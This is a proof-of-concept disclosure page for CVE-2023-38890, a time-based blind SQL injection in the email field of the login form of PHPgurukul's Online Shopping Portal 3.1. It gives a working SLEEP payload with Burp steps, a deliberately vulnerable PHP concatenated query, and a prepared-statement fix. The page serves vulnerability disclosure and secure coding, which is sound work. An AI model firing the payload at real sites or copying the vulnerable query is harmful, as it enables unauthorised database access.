CVE-2023-38890 PoC — Online Shopping Portal SQL Injection Vulnerability

Source
Associated Vulnerability
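Title: Online Shopping Portal SQL Injection Vulnerability (CVE-2023-38890)
Description: Online Shopping Portal is an open-source online shopping portal by individual developer Anuj Kumar. Online Shopping Portal Project version 3.1 has a security vulnerability caused by insufficient validation of the input the user supplies in the username field, which leads to SQL injection; an attacker can exploit it to execute arbitrary SQL commands through the login form.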
Description
poc
Readme
# CVE-2023-38890
### Description
[Online Shopping Portal Project V3.1](https://phpgurukul.com/shopping-portal-free-download/) allows remote attackers to execute arbitrary SQL commands/queries via the login form, leading to unauthorized access and potential data manipulation. This vulnerability arises due to insufficient validation of user-supplied input in the username field, enabling SQL Injection attacks.

**Exploit Title:** Online Shopping Portal Project V3.1 PHPgurukul - Time-Based Blind Sqli

**Exploit Author:** Akshad Joshi

**Vendor Homepage:** https://phpgurukul.com

**Software Link:** https://phpgurukul.com/shopping-portal-free-download/

**Tested on:** Linux

## Steps to Reproduce

***Use this payload*** *(URL-encode it)*:
```sql
test1@test.com' AND (SELECT 1866 FROM (SELECT(SLEEP(10)))JHcH) AND 'GMDH'='GMDH
```
1. Visit http://localhost/shopping/login.php
2. Log in via the account you created.
3. There is front-end validation, so capture the request in Burp.
4. Pass the above payload in the email parameter and observe the response time.
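
The root cause described above (the login value reaching the SQL text unvalidated, with only front-end checks in the way) and its fix, shown as an added example that is not code from Online Shopping Portal or from this README. The `users(id, email, password)` schema, the function names and the use of `password_hash()` values are assumptions made for illustration.

```php
<?php
// Added example: hypothetical login lookup, not the project's own code.
// Assumed schema: users(id, email, password), password = password_hash() value.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// Vulnerable pattern: the email value is concatenated into the SQL text, so a
// single quote in it closes the string literal and the remainder is parsed as
// SQL. A time-based blind payload relies on exactly this.
function find_user_vulnerable(mysqli $db, string $email): ?array
{
    $result = $db->query("SELECT id, password FROM users WHERE email='" . $email . "'");
    return $result->fetch_assoc() ?: null;
}

// Hardened lookup: server-side validation plus a prepared statement.
function find_user(mysqli $db, string $email): ?array
{
    // Browser-side checks disappear once the request is edited in a proxy,
    // so the same rule has to be enforced on the server. This is defence in
    // depth only: a quote is legal in an email local part, so validation
    // alone does not stop injection.
    if (strlen($email) > 254 || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }

    // The fix: the value travels as a bound parameter, separate from the SQL
    // text, so it is always treated as data, whatever characters it holds.
    $stmt = $db->prepare('SELECT id, password FROM users WHERE email = ? LIMIT 1');
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // get_result() needs the mysqlnd driver
    $stmt->close();
    return $row ?: null;
}

// Login check built on the hardened lookup.
function login(mysqli $db, string $email, string $password): bool
{
    $row = find_user($db, $email);
    return $row !== null && password_verify($password, $row['password']);
}
```

With the bound parameter, the payload from this README is compared to the `email` column as one literal string, so the response time no longer depends on its contents.
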
File Snapshot

[4.0K] /data/pocs/ada8efbe23cac9b3a9341814c211401a3f37882e
└── [1.0K] README.md

0 directories, 1 file